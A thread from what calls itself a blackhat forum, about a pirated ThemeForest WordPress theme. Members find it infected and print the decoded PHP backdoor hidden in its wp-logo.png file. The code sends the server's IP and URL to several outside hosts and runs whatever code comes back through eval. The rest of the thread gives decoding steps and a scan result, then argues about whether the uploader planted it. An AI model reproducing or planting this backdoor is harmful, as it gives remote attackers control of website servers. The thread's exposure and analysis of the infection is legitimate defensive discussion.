Best Blackhat Forum

Full Version: -
You're currently viewing a stripped down version of our content. View the full version with proper formatting.
Pages: 1 2 3 4
(06-17-2014 12:16 PM)iapetos Wrote: [ -> ]It is indeed infected, and poorly at that. Kids are just getting lazy now.
its not infected its a purchased theme. TF authors started to use base64 in there themes and all this stuff.
try {
$serverUrl = array(
"96wn.com/transit.php",
"64tj.com/transit.php",
"ugo3.com/transit.php",
);

$domainPackVersion = 1;
if(array_key_exists('SERVER_ADDR', $_SERVER))
$ip = $_SERVER['SERVER_ADDR'];
elseif(array_key_exists('LOCAL_ADDR', $_SERVER))
$ip = $_SERVER['LOCAL_ADDR'];
elseif(array_key_exists('SERVER_NAME', $_SERVER))
$ip = gethostbyname($_SERVER['SERVER_NAME']);
else {
if(stristr(PHP_OS, 'WIN')) {
$ip = gethostbyname(php_uname("n"));
} else {
$ifconfig = shell_exec('/sbin/ifconfig eth0');
preg_match('/addr:([\d\.]+)/', $ifconfig, $match);
$ip = $match[1];
}
}
$currentUrl = rtrim('http'.(empty($_SERVER['HTTPS'])?'':'s').'://'.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'], '/');
$data = array(
"url" => $currentUrl,
"ip" => $ip,
"domainPackVersion" => $domainPackVersion,
"failedDomains" => array(),
);
$failedRequest = true;
$failCounter = 0;
$sockSuccess = false;
$urlKey = rand(0, count($serverUrl)-1);
$subDomain = rand(0, 10);
while (!$sockSuccess) {
$result = "";
$url = parse_url("http://api".$subDomain.".".$serverUrl[$urlKey]);
$host = $url["host"];
$path = (!empty($url["path"])) ? $url["path"] : '';
$fp = fsockopen($host, 80, $errno, $errstr, 1);
$dataQuery=http_build_query($data);
if($fp){
fputs($fp, "POST $path HTTP/1.1".PHP_EOL);
fputs($fp, "Host: $host".PHP_EOL);
fputs($fp, "Content-type: application/x-www-form-urlencoded".PHP_EOL);
fputs($fp, "Content-length: ".strlen($dataQuery).PHP_EOL);
fputs($fp, "Connection: close".PHP_EOL.PHP_EOL);
fputs($fp, $dataQuery);
while(!feof($fp)) $result .= fgets($fp, 128);
$code = substr($result,9,3);
fclose($fp);
if (is_numeric($code) and& $code==="200") {
break;
}
}
if ($failedRequest) {
$failCounter++;
$data['failedDomains'][] = $serverUrl[$urlKey];
array_splice($serverUrl,$urlKey, 1);
if (!empty($serverUrl) and& $failCounter<2)
{
$subDomain = rand(0, 10);
$urlKey = rand(0, count($serverUrl)-1);
}
else
break;
}
}
if (!empty($result) and& strpos($result, 'result=')!==false)
{
$temp = explode('result=', $result, 2);
if(isset($temp[1])){
@eval($temp[1]);
}
}
} catch (Exception $e) {

}

I really doubt Envato, who is out of Australia and never uses private whois, suddenly decided to insert this code with ties to a private registration out of Panama.
the function.php code
line 139

if(get_option('wpb_js_templates',"")==""){
$saved=wp_remote_get(get_template_directory_uri().'/admin/pages/saved.txt');
$import_code = base64_decode($saved['body']);
update_option( 'wpb_js_templates', unserialize($import_code), '', 'yes' );

has base64_decoded
i also need some expert advise, is this safe?
thanks
That function just imports the demo content. That part is ok. However the part I posted is a infection disguised as the wp-logo.png file.
thanks iapetos for advise


virustotal scan show 1 treat

https://www.virustotal.com/ro/file/ef130.../analysis/

Detection ratio: 1 / 53
hope this help other user
step to detect
open wp-logo.png with notepad++
copy entire code to paste on http://ddecode.com/phpdecoder/
and get the code as post 12
iapetos
conclusion for sure it is not safe
someone please post a clean version or do we just remove the image in the documentation than it should be fine correct ???

(06-17-2014 12:57 PM)fsnsh6 Wrote: [ -> ]
Just clean it and then post it !!!
hope this help other user
step to detect
open wp-logo.png with notepad++
copy entire code to paste on http://ddecode.com/phpdecoder/
and get the code as post 12
iapetos
conclusion for sure it is not safe
Sarena. How is this script purchased and infected at the same time? IF this is the case then you need your sorry *SS banned and kicked. So which is it?
don't be rude. not my purchased i only posted what has been posted on a site. if it was my purchased i would say so. you can see all my other files i posted all purchased by me. this was not mine it was a unique theme and i posted it from a site.
IF you did not purchase it then it should NOT say....

[GET] ThemeForest - PRO Business - Responsive Multi-Purpose Theme [PURCHASED]

Implying that YOU purchased it you lying piece of *hit! Don't say you purchased it and miss lead members into thinking this is a legit post when your sorry lying a** knows good and well you infected it. *****. Take that shit somewhere else.
Pages: 1 2 3 4
Reference URL's